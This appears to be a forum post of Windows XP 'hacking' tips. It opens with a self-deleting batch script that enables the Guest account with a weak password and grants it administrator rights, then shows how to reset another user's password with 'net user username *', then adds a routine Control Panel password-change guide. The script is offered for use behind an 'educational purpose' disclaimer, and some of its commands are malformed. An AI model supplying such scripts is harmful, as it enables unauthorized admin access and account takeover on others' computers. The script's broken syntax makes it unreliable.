Well thats possible ..
Please Dont missuse This ARTICLE. Its meant for "Educational Purpose" only or for helping those who have lost their PASSWORD.
HaCk "GUEST" with Admin privileges........
Code:
echo off
title Please wait...
cls
net user add Username Password /add
net user localgroup Administrators Username /add
net user Guest 420 /active:yes
net localgroup Guests Guest /DELETE
net localgroup Administrators Guest /add
del %0
Copy this to notepad and save the file as "Guest2admin.bat"
then u can double click the file to execute or run in the cmd.
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How to change Windows Password

The following document is for educational purposes only. I, the author , will not be held responsible for any misuse of this information.
This is a very simple trick and can be Used on any windows xp computer.
1. Go to Start>Run and type "cmd".
2. A new dialogue box will come up. There type 'net user' without the quotes.
3. This will show you the users running on the system.
4. Now type 'net user username *' without quotes and replacing username with the username of user.
Which means if the username of user is cooldude you have to type 'net user cooldude*' without quotes.
5. Now system will ask you to type a new password.
Here is where you type the new password.
Don't be confused because when you write nothing you type will be visible.
This is done to prevent shoulder surfers.
Just carefully type the password and press enter
6. Then retype the password and your done.
IF YOUR PROBLEM IS NOT COMPLEX IT CAN SOLVED AS BELOW
ost of us know that changing your Windows XP logon password regularly is a good habit to help keep your PC secure. Changing your password in Windows XP is easy and is something you should think about doing if you're having problems remembering the one you're using now.
Follow the easy steps below to change your Windows XP logon password:
Time Required: Changing your Windows XP logon password usually takes less than a few minutes
Here's How:
Click on Start and then Control Panel.
Click on the User Accounts link.
Note: If you're viewing the Classic View of Control Panel, double-click on theUser Accounts icon.
In the pick an account to change area of the User Accounts window, click on your Windows XP user name.
Choose the Change my password link.
In the first text box, enter your existing password.
In the next two text boxes, enter the password you would like to start using.
Entering the password twice helps to make sure that you typed your new password correctly.
Click the Change Password button to confirm your changes.
You can now close the User Accounts window and the Control Panel window.
Now that your Windows XP logon password has been changed, you must use your new password to log on to Windows XP from this point forward.
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Try "control userpasswords2" in run..
There is also one provision to reset the password,,,,,,,,,.
Thank you....!

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